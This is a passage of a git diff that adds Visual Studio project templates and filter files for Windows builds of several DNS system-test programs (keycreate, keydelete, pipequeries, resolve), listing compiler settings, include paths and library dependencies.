+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <BrowseInformation>true</BrowseInformation>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <ClCompile>
+ <WarningLevel>Level1</WarningLevel>
+ <TreatWarningAsError>true</TreatWarningAsError>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+ <WholeProgramOptimization>false</WholeProgramOptimization>
+ <StringPooling>true</StringPooling>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>false</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <ClCompile Include="..\tkey\keycreate.c" />
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project>
diff --git a/bin/tests/system/win32/keycreate.vcxproj.user b/bin/tests/system/win32/keycreate.vcxproj.user
new file mode 100644
index 0000000..ace9a86
--- /dev/null
+++ b/bin/tests/system/win32/keycreate.vcxproj.user
@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/keydelete.vcxproj.filters.in b/bin/tests/system/win32/keydelete.vcxproj.filters.in
new file mode 100644
index 0000000..1e8cb3d
--- /dev/null
+++ b/bin/tests/system/win32/keydelete.vcxproj.filters.in
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="..\tkey\keydelete.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/keydelete.vcxproj.in b/bin/tests/system/win32/keydelete.vcxproj.in
new file mode 100644
index 0000000..6c77f65
--- /dev/null
+++ b/bin/tests/system/win32/keydelete.vcxproj.in
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|@PLATFORM@">
+ <Configuration>Debug</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|@PLATFORM@">
+ <Configuration>Release</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{85ADFF2A-BE31-4B8D-9089-9AD56CE78D7E}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>keydelete</RootNamespace>
+ @WINDOWS_TARGET_PLATFORM_VERSION@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <LinkIncremental>true</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <LinkIncremental>false</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <ClCompile>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <WarningLevel>Level4</WarningLevel>
+ <TreatWarningAsError>false</TreatWarningAsError>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <BrowseInformation>true</BrowseInformation>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <ClCompile>
+ <WarningLevel>Level1</WarningLevel>
+ <TreatWarningAsError>true</TreatWarningAsError>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+ <WholeProgramOptimization>false</WholeProgramOptimization>
+ <StringPooling>true</StringPooling>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>false</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <ClCompile Include="..\tkey\keydelete.c" />
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project>
diff --git a/bin/tests/system/win32/keydelete.vcxproj.user b/bin/tests/system/win32/keydelete.vcxproj.user
new file mode 100644
index 0000000..ace9a86
--- /dev/null
+++ b/bin/tests/system/win32/keydelete.vcxproj.user
@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/pipequeries.vcxproj.filters.in b/bin/tests/system/win32/pipequeries.vcxproj.filters.in
new file mode 100644
index 0000000..62374cd
--- /dev/null
+++ b/bin/tests/system/win32/pipequeries.vcxproj.filters.in
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="..\pipelined\pipequeries.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/pipequeries.vcxproj.in b/bin/tests/system/win32/pipequeries.vcxproj.in
new file mode 100644
index 0000000..1ce5b0a
--- /dev/null
+++ b/bin/tests/system/win32/pipequeries.vcxproj.in
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|@PLATFORM@">
+ <Configuration>Debug</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|@PLATFORM@">
+ <Configuration>Release</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{E1478F40-786C-4738-8E99-E7A71DD98661}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>pipequeries</RootNamespace>
+ @WINDOWS_TARGET_PLATFORM_VERSION@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <LinkIncremental>true</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <LinkIncremental>false</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <ClCompile>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <WarningLevel>Level4</WarningLevel>
+ <TreatWarningAsError>false</TreatWarningAsError>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <BrowseInformation>true</BrowseInformation>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <ClCompile>
+ <WarningLevel>Level1</WarningLevel>
+ <TreatWarningAsError>true</TreatWarningAsError>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+ <WholeProgramOptimization>false</WholeProgramOptimization>
+ <StringPooling>true</StringPooling>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <CompileAs>CompileAsC</CompileAs>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>false</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile>
+ <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
+ <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+ <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <ClCompile Include="..\pipelined\pipequeries.c" />
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project>
diff --git a/bin/tests/system/win32/pipequeries.vcxproj.user b/bin/tests/system/win32/pipequeries.vcxproj.user
new file mode 100644
index 0000000..ace9a86
--- /dev/null
+++ b/bin/tests/system/win32/pipequeries.vcxproj.user
@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/resolve.vcxproj.filters.in b/bin/tests/system/win32/resolve.vcxproj.filters.in
new file mode 100644
index 0000000..882e23f
--- /dev/null
+++ b/bin/tests/system/win32/resolve.vcxproj.filters.in
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="..\resolve.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/resolve.vcxproj.in b/bin/tests/system/win32/resolve.vcxproj.in
new file mode 100644
index 0000000..36bd283
--- /dev/null
+++ b/bin/tests/system/win32/resolve.vcxproj.in
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|@PLATFORM@">
+ <Configuration>Debug</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|@PLATFORM@">
+ <Configuration>Release</Configuration>
+ <Platform>@PLATFORM@</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{F66D8B7E-721D-4602-99AD-820D19AD1313}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>resolve</RootNamespace>
+ @WINDOWS_TARGET_PLATFORM_VERSION@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>MultiByte</CharacterSet>
+ @PLATFORM_TOOLSET@
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <LinkIncremental>true</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'">
+ <LinkIncremental>false</LinkIncremental>
+ <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir>
+ <IntDir>.\$(Configuration)\</IntDir>
+ <IntDirSharingDetected>None</IntDirSharingDetected>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'">
+ <ClCompile>
+ <PrecompiledHeader>
+ </PrecompiledHeader>
+ <WarningLevel>Level4</WarningLevel>
+ <TreatWarningAsError>false</TreatWarningAsError>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile>
+ <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation>
+ <ObjectFileName>.\$(Configuration)\</ObjectFileName>
+ <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName>
+ <BrowseInformation>true</BrowseInformation>
